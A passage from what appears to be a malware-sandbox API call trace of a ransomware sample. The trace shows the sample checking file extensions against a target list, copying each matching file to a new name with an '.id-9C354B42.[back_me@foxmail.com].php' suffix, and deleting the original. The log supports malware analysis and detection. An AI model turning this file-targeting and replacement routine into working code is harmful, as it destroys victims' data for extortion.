lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.911] lstrlenW (lpString=".xls") returned 4 [0046.911] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.911] lstrlenW (lpString=".xlsx") returned 5 [0046.911] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.911] lstrlenW (lpString=".ppt") returned 4 [0046.911] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0046.911] lstrlenW (lpString=".zip") returned 4 [0046.911] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.911] lstrlenW (lpString=".rar") returned 4 [0046.911] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.912] lstrlenW (lpString=".bz2") returned 4 [0046.912] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.912] lstrlenW (lpString=".7z") returned 3 [0046.912] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0046.912] lstrlenW (lpString=".dbf") returned 4 [0046.912] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0046.912] lstrlenW (lpString=".1cd") returned 4 [0046.912] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0046.912] lstrlenW (lpString=".jpg") returned 4 [0046.912] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.912] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0046.912] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.912] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0046.913] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=25106) returned 1 [0046.913] CloseHandle (hObject=0x214) returned 1 [0046.913] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png")) returned 0x20 [0046.913] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.913] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0046.913] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.913] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.913] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0047.228] GetLastError () returned 0x0 [0047.228] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x6212, lpOverlapped=0x0) returned 1 [0047.230] WriteFile (in: hFile=0x194, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x6220, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x6220, lpOverlapped=0x0) returned 1 [0047.231] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.231] WriteFile (in: hFile=0x194, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.231] SetEndOfFile (hFile=0x194) returned 1 [0047.231] CloseHandle (hObject=0x194) returned 1 [0047.231] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.231] SetEndOfFile (hFile=0x214) returned 1 [0047.232] CloseHandle (hObject=0x214) returned 1 [0047.232] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.241] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png")) returned 1 [0047.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0047.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0047.241] lstrlenW (lpString=".doc") returned 4 [0047.241] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.241] lstrlenW (lpString=".docx") returned 5 [0047.241] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.241] lstrlenW (lpString=".pdf") returned 4 [0047.241] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.241] lstrlenW (lpString=".xls") returned 4 [0047.241] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.241] lstrlenW (lpString=".xlsx") returned 5 [0047.241] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.241] lstrlenW (lpString=".ppt") returned 4 [0047.241] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0047.241] lstrlenW (lpString=".zip") returned 4 [0047.242] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.242] lstrlenW (lpString=".rar") returned 4 [0047.242] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.242] lstrlenW (lpString=".bz2") returned 4 [0047.242] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.242] lstrlenW (lpString=".7z") returned 3 [0047.242] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0047.242] lstrlenW (lpString=".dbf") returned 4 [0047.242] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0047.242] lstrlenW (lpString=".1cd") returned 4 [0047.242] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0047.242] lstrlenW (lpString=".jpg") returned 4 [0047.242] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0047.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0047.242] lstrlenW (lpString=".doc") returned 4 [0047.242] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.242] lstrlenW (lpString=".docx") returned 5 [0047.242] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.242] lstrlenW (lpString=".pdf") returned 4 [0047.242] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.242] lstrlenW (lpString=".xls") returned 4 [0047.242] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.242] lstrlenW (lpString=".xlsx") returned 5 [0047.242] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.242] lstrlenW (lpString=".ppt") returned 4 [0047.242] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0047.242] lstrlenW (lpString=".zip") returned 4 [0047.243] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.243] lstrlenW (lpString=".rar") returned 4 [0047.243] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.243] lstrlenW (lpString=".bz2") returned 4 [0047.243] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.243] lstrlenW (lpString=".7z") returned 3 [0047.243] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0047.243] lstrlenW (lpString=".dbf") returned 4 [0047.243] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0047.243] lstrlenW (lpString=".1cd") returned 4 [0047.243] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0047.243] lstrlenW (lpString=".jpg") returned 4 [0047.243] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.243] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0047.243] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.243] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0047.244] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=2552) returned 1 [0047.244] CloseHandle (hObject=0x214) returned 1 [0047.244] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif")) returned 0x20 [0047.244] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.244] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0047.244] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.244] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.244] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0047.246] GetLastError () returned 0x0 [0047.246] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x9f8, lpOverlapped=0x0) returned 1 [0047.248] WriteFile (in: hFile=0x1b4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xa00, lpOverlapped=0x0) returned 1 [0047.248] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.248] WriteFile (in: hFile=0x1b4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.249] SetEndOfFile (hFile=0x1b4) returned 1 [0047.249] CloseHandle (hObject=0x1b4) returned 1 [0047.249] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.249] SetEndOfFile (hFile=0x214) returned 1 [0047.250] CloseHandle (hObject=0x214) returned 1 [0047.250] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.250] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif")) returned 1 [0047.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0047.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0047.250] lstrlenW (lpString=".doc") returned 4 [0047.250] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.250] lstrlenW (lpString=".docx") returned 5 [0047.250] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.250] lstrlenW (lpString=".pdf") returned 4 [0047.250] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.250] lstrlenW (lpString=".xls") returned 4 [0047.250] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.250] lstrlenW (lpString=".xlsx") returned 5 [0047.251] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.251] lstrlenW (lpString=".ppt") returned 4 [0047.251] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0047.251] lstrlenW (lpString=".zip") returned 4 [0047.251] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.251] lstrlenW (lpString=".rar") returned 4 [0047.251] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.251] lstrlenW (lpString=".bz2") returned 4 [0047.251] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.251] lstrlenW (lpString=".7z") returned 3 [0047.251] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0047.251] lstrlenW (lpString=".dbf") returned 4 [0047.251] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0047.251] lstrlenW (lpString=".1cd") returned 4 [0047.251] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0047.251] lstrlenW (lpString=".jpg") returned 4 [0047.251] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0047.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0047.251] lstrlenW (lpString=".doc") returned 4 [0047.251] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.251] lstrlenW (lpString=".docx") returned 5 [0047.251] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.251] lstrlenW (lpString=".pdf") returned 4 [0047.251] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.251] lstrlenW (lpString=".xls") returned 4 [0047.251] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.251] lstrlenW (lpString=".xlsx") returned 5 [0047.252] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.252] lstrlenW (lpString=".ppt") returned 4 [0047.252] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0047.252] lstrlenW (lpString=".zip") returned 4 [0047.252] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.252] lstrlenW (lpString=".rar") returned 4 [0047.252] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.252] lstrlenW (lpString=".bz2") returned 4 [0047.252] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.252] lstrlenW (lpString=".7z") returned 3 [0047.252] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0047.252] lstrlenW (lpString=".dbf") returned 4 [0047.252] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0047.252] lstrlenW (lpString=".1cd") returned 4 [0047.252] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0047.252] lstrlenW (lpString=".jpg") returned 4 [0047.252] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.252] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0047.252] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.252] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0047.253] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=18817) returned 1 [0047.253] CloseHandle (hObject=0x214) returned 1 [0047.253] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png")) returned 0x20 [0047.253] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.253] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0047.253] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.253] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.254] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0047.254] GetLastError () returned 0x0 [0047.254] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x4981, lpOverlapped=0x0) returned 1 [0047.255] WriteFile (in: hFile=0x1b4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x4990, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x4990, lpOverlapped=0x0) returned 1 [0047.256] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.256] WriteFile (in: hFile=0x1b4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.256] SetEndOfFile (hFile=0x1b4) returned 1 [0047.257] CloseHandle (hObject=0x1b4) returned 1 [0047.257] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.257] SetEndOfFile (hFile=0x214) returned 1 [0047.258] CloseHandle (hObject=0x214) returned 1 [0047.258] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.258] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png")) returned 1 [0047.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0047.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0047.258] lstrlenW (lpString=".doc") returned 4 [0047.258] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.258] lstrlenW (lpString=".docx") returned 5 [0047.258] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.258] lstrlenW (lpString=".pdf") returned 4 [0047.258] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.258] lstrlenW (lpString=".xls") returned 4 [0047.258] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.258] lstrlenW (lpString=".xlsx") returned 5 [0047.258] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.258] lstrlenW (lpString=".ppt") returned 4 [0047.258] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0047.258] lstrlenW (lpString=".zip") returned 4 [0047.258] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.259] lstrlenW (lpString=".rar") returned 4 [0047.259] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.259] lstrlenW (lpString=".bz2") returned 4 [0047.259] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.259] lstrlenW (lpString=".7z") returned 3 [0047.259] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0047.259] lstrlenW (lpString=".dbf") returned 4 [0047.259] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0047.259] lstrlenW (lpString=".1cd") returned 4 [0047.259] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0047.259] lstrlenW (lpString=".jpg") returned 4 [0047.259] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0047.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0047.259] lstrlenW (lpString=".doc") returned 4 [0047.259] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.259] lstrlenW (lpString=".docx") returned 5 [0047.259] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.259] lstrlenW (lpString=".pdf") returned 4 [0047.259] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.259] lstrlenW (lpString=".xls") returned 4 [0047.259] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.259] lstrlenW (lpString=".xlsx") returned 5 [0047.259] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.259] lstrlenW (lpString=".ppt") returned 4 